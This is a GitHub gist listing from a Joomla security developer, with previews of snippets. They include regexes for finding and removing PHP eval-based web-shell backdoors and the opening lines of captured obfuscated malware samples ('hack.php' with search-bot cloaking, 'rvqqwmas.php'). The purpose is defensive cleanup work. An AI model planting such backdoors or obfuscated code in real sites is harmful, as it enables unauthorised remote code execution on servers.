Skip to content

Instantly share code, notes, and snippets.

🎯
Focusing

Phil Taylor PhilETaylor

🎯
Focusing
Block or report user

Report or block PhilETaylor

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View content
if (!is_string(@$json->version)) {
$json->version = '';
}
View removebtn
<script>
jQuery(document).ready(function(){
jQuery('#submitBtn').click(function(e){
jQuery(this).remove();
});
});
</script>
@PhilETaylor
PhilETaylor / match.regex
Last active Aug 29, 2015
Regexes For Perfect Removal
View match.regex
<\?php\s*eval\(base64_decode\(\$_POST\['[a-zA-Z0-9]{7}'\]\)\)\;\?>|<\?php\s*\$sF="PCT4BA6ODSE_";\$s21=strtolower\(\$sF\[4\]\.\$sF\[5\]\.\$sF\[9\]\.\$sF\[10\]\.\$sF\[6\]\.\$sF\[3\]\.\$sF\[11\]\.\$sF\[8\]\.\$sF\[10\]\.\$sF\[1\]\.\$sF\[7\]\.\$sF\[8\]\.\$sF\[10\]\);\$s20=strtoupper\(\$sF\[11\]\.\$sF\[0\]\.\$sF\[7\]\.\$sF\[9\]\.\$sF\[2\]\);if\s\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\s\{eval\(\$s21\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\);\}\?>|<\?php\s*\$qV=\"stop_\";\$s20=strtoupper\(\$qV\[4\].\$qV\[3\].\$qV\[2\].\$qV\[0\].\$qV\[1\]\);if\(isset\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\)\)\{eval\(\$\{\$s20\}\['[a-zA-Z0-9]{7}'\]\);\}\?>
<\?php\s+\$.{4,6}\s=\s\".{4,32}\";\sif\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s{\s\$.{4,10}\s=\s\$\_REQUEST\[\'.{4,10}\'\];\seval\(\$.{4,10}\);\sexit\(\);\s\}\s+if\(isset\(\$_REQUEST\[\'.{4,10}\'\]\)\)\s\{\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\s\$_REQUEST\[\'.{4,10}\'\];\s\$.{4,10}\s=\sfopen\(\$.{4,10},\s\'w\'\);\s\$.{4,10}\s=\sfwrite\(\$.{4,10},\s\$.{4,10}\);\sfclose\(\
@PhilETaylor
PhilETaylor / time.php
Created Feb 28, 2015
Check Server Time
View time.php
<?php
/**
* @package Blue Flame Network (bfNetwork)
* @copyright Copyright (C) 2011, 2012, 2013, 2014, 2015 Blue Flame IT Ltd. All rights reserved.
* @license GNU General Public License version 3 or later
* @link http://myJoomla.com/
* @author Phil Taylor / Blue Flame IT Ltd.
*
* bfNetwork is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
View test.php
<?php
define('_JEXEC', 1);
define('JPATH_BASE', __DIR__);
require_once JPATH_BASE . '/includes/defines.php';
error_reporting(E_ALL);
ini_set('display_errors', 1);
require_once JPATH_BASE . '/includes/framework.php';
@PhilETaylor
PhilETaylor / 6556.php
Last active Aug 29, 2015
Test case for issue 6556
View 6556.php
<?php
// place this file in root of Joomla 3.4.1 Site
// Bootstrap
define('_JEXEC', 1);
define('JPATH_BASE', __DIR__);
require_once JPATH_BASE . '/includes/defines.php';
require_once JPATH_BASE . '/includes/framework.php';
$app = JFactory::getApplication('site');
View hack.php
<?
${"GLOBALS"}["rccbcjbve"] = "credit";
${"GLOBALS"}["ecgmatfzch"] = "ctx";
${"GLOBALS"}["gbmjnqnelon"] = "b_t";
if (!defined("CREDIT")) {
${"GLOBALS"}["iqygiudjlzx"] = "b_t";
strstr(strtolower($_SERVER["HTTP_USER_AGENT"]), "googlebot") ? ${${"GLOBALS"}["gbmjnqnelon"]} = "1" : ${${"GLOBALS"}["gbmjnqnelon"]} = "0";
strstr(strtolower($_SERVER["HTTP_USER_AGENT"]), "bingbot") ? ${${"GLOBALS"}["gbmjnqnelon"]} = "2" : ${${"GLOBALS"}["iqygiudjlzx"]} = ${${"GLOBALS"}["gbmjnqnelon"]};
${${"GLOBALS"}["ecgmatfzch"]} = stream_context_create(array("http" => array("timeout" => 3)));
try {
@PhilETaylor
PhilETaylor / rvqqwmas.php
Created May 5, 2015
hacked example May 2015
View rvqqwmas.php
<?php
$burk = 'it]]$e_$r'; $fiance ='tykei6';$incoherent = 'ah[';$descry='c';$fucku = 'W$])ONWdT'; $betta= 'Iw';$drip='HT(na';$expendable= ')'; $darda= 'e';$capturers='d';$lettered='g'; $clarabelle='e';$bait = 'rto"ecvm';
$alverta ='o';
$lolly ='da`ic?g_';
$biscuit= '?'; $bondsman= 'O(=SL';$breastworks= 'RTsb,_lf';$hocus= 'U(["Q';
$interruption= 'Er'; $boxers='""ET['; $evaleen='T';
View gist:d6314c46dd44fabd5479
Return-Path: <agent@ukrs394972.pur3.net>
Delivered-To: phil@phil-taylor.com
Received: from smtp39.gate.ord1a (smtp39.gate.ord1a.rsapps.net [10.130.4.39])
by store127a.mail.ord1a (SMTP Server) with ESMTP id 42DB280001
for <phil@phil-taylor.com>; Fri, 22 May 2015 07:28:07 -0400 (EDT)
Received: from [172.20.100.8] ([172.20.100.8:41554] helo=smtp8.gate.dfw1a)
by smtp39.gate.ord1a.rsapps.net (envelope-from <agent@ukrs394972.pur3.net>)
(ecelerity 2.2.3.49 r(42060/42061)) with ESMTPS (cipher=AES256-SHA)
id A3/A8-14118-7C21F555; Fri, 22 May 2015 07:28:07 -0400
X-Spam-Threshold: 95
You can’t perform that action at this time.